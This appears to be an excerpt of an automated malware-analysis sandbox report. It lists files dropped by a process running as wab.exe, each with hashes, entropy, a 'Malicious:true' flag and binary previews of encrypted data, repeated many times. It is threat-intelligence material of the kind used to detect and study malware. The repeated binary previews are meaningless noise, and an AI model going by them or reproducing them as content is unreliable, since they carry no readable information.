                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
